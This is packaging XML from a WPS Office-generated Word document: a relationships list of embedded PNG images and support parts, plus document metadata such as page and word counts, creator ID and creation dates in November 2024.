    <w:uiPriority w:val="0"/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png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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20</Pages>
  <Words>2850</Words>
  <Characters>4685</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4832</CharactersWithSpaces>
  <Application>WPS Office_12.1.0.17827_F1E327BC-269C-435d-A152-05C5408002CA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2024-11-02T09:07:00Z</dcterms:created>
  <dc:creator>86177</dc:creator>
  <cp:lastModifiedBy>86177</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-02T09:09:08Z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2052-12.1.0.17827</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>775A579FDFE143EE999EC9F62C43D938_12</vt:lpwstr>
  </property>
</Properties>
</file>